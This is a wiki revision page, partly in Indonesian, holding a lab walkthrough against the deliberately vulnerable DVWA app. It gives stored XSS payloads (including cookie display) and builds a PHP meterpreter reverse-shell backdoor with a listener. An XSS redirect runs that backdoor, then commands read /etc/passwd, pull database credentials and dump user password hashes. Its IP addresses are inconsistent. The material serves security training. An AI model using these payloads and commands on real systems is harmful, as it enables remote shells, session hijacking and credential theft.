Difference between revisions of "DVWA: XSS"
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
Line 74: | Line 74: | ||
* Reset Database DVWA, supaya XSS yang pernah dilakukan tidak muncul lagi. | * Reset Database DVWA, supaya XSS yang pernah dilakukan tidak muncul lagi. | ||
* Klik > XSS (Stored) | * Klik > XSS (Stored) | ||
− | * | + | * Nama > "Test 3" |
− | * | + | * Message > "<script>alert(document.cookie)</script>" |
* Klik > Sign Guestbook | * Klik > Sign Guestbook | ||
− | + | Akibatnya cookie/session yang digunakan untuk hubungan komunikasi dengan webserver dapat diambil. | |
− | + | Attacker dapat memodifikasi XSS script ini untuk mengirimkan cookie ke lokasi remote, bukan menampilkannya. | |
− | + | Bayangkan jika ini sebuah situs bank online, setiap kali user login & informasi cookie dikirim ke lokasi remote untuk di manfaatkan. | |
− | |||
− | |||
==Build PHP msfpayload== | ==Build PHP msfpayload== |
Revision as of 06:00, 29 May 2017
sumber: http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson9/index.html
Tujuan
- Test a basic cross site scripting (XSS) attack
- Test an iframe cross site scripting (XSS) attack
- Test a cookie cross site scripting (XSS) attack
- Create a php/meterpreter/reverse_tcp payload
- Start the php/meterpreter/reverse_tcp listener
- Upload the PHP payload to the DVWA Upload screen
- Test a PHP Payload cross site scripting (XSS) attack
Di sisi DVWA
Cek IP
ifconfig
Fix Stored Cross Site Scripting (XSS) Comment Box
Edit index.php
cd /var/www/html/DVWA-1.9/vulnerabilities/xss_s/ vi index.php
Search dengan keyword mtxMessage Ubah maxlength=50
<textarea name=\"mtxMessage\" cols=\"50\" rows=\"3\" maxlength=\"50\"></textarea>
menjadi maxlength=250
<textarea name=\"mtxMessage\" cols=\"50\" rows=\"3\" maxlength=\"250\"></textarea>
Di sisi Kali Linux
Cek IP Kali Linux
ifconfig -a
Enable Javascript di Browser
Buka Firefox Preferences > Content > Uncheck - Block pop-up windows
Masuk ke DVWA
- Login
- DVWA Security > Low
XSS Stored Basic Exploit Test
- Klik > XSS (Stored)
- Name > "Test 1"
- Message > "<script>alert("This is a XSS Exploit Test")</script>"
- Klik > Sign Guestbook
XSS Stored IFRAME Exploit Test
- Reset Database DVWA, supaya XSS yang pernah dilakukan tidak muncul lagi.
- Klik > XSS (Stored)
- Nama > "Test 2"
- Message > "<iframe src="http://www.cnn.com"></iframe>"
- Klik > Sign Guestbook
Tampak bahwa CNN muncul di bawah "Test 2" . Teknik ini menjadi exploit yang sangat powerful yang dapat digunakan dalam Social Engineering Toolkit (SET) untuk cloning web.
XSS Stored COOKIE Exploit Test
- Reset Database DVWA, supaya XSS yang pernah dilakukan tidak muncul lagi.
- Klik > XSS (Stored)
- Nama > "Test 3"
- Message > "<script>alert(document.cookie)</script>"
- Klik > Sign Guestbook
Akibatnya cookie/session yang digunakan untuk hubungan komunikasi dengan webserver dapat diambil. Attacker dapat memodifikasi XSS script ini untuk mengirimkan cookie ke lokasi remote, bukan menampilkannya. Bayangkan jika ini sebuah situs bank online, setiap kali user login & informasi cookie dikirim ke lokasi remote untuk di manfaatkan.
Build PHP msfpayload
mkdir -p /root/backdoor cd /root/backdoor msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=4444 R > FORUM_BUG.php ls -l FORUM_BUG.php
Select "Upload" from the left navigation menu. Click Browse
Start msfconsole
msfconsole
use exploit/multi/handler set PAYLOAD php/meterpreter/reverse_tcp set LHOST 192.168.1.105 set LPORT 4444 exploit
XSS Stored window.location Exploit Test
- Reset Database DVWA, supaya XSS yang pernah dilakukan tidak muncul lagi.
- Klik > XSS (Stored)
Name: Test 4 Message:
<script>window.location="http://192.168.0.100/DVWA-1.9/hackable/uploads/FORUM_BUG.php" </script> Replace 192.168.1.106 with the IP Address obtain from Fedora 14 in (Section 3, Step 3).
Click Sign Guestbook Click OK when the Test 1 Message is displayed
shell
Establishes a "sh" shell.
tail /etc/passwd
This produces a potential prospect list for a ssh brute force attack
whoami Displays the name of the user. grep apache /etc/passwd The goal of this command is obtaining the home directory for the apache username. find /var/www/* -print | grep config Here I am wanting to find all the configuration files in the /var/www directory.
grep "db_" /var/www/html/dvwa/config/config.inc.php This produces the database name, username, and password information to log into the mysql database. echo "use dvwa; show tables;" | mysql -uroot -p123456 This command produces a table list of the dvwa database. echo "use dvwa; desc users;" | mysql -uroot -p123456 This command describes the columns of the users table in the dvwa datase. echo "select user,password from dvwa.users;" | mysql -uroot -p123456 This command displays the user and password information for each user in the dvwa.users table.
echo "
" >> /var/www/html/dvwa/hackable/uploads/xss.html Place the html <pre> tag in the xss.html file. The <pre> is used as a pre-formatter. echo "select user,password from dvwa.users;" | mysql -uroot -p123456 >> /var/www/html/dvwa/hackable/uploads/xss.html Place user and password for the dvwa.users table in the xss.html file. echo "
" >> /var/www/html/dvwa/hackable/uploads/xss.html Place the close html tag in the xss.html file.
echo "
Your Name
" >> /var/www/html/dvwa/hackable/uploads/xss.html Replace the string "Your Name" with your actual name. date >> /var/www/html/dvwa/hackable/uploads/xss.html
On BackTrack, place the below URI in Firefox http://192.168.0.100/DVWA-1.9/hackable/uploads/xss.html Replace the above IP address with the IP Address obtained in (Section 3, Step 3).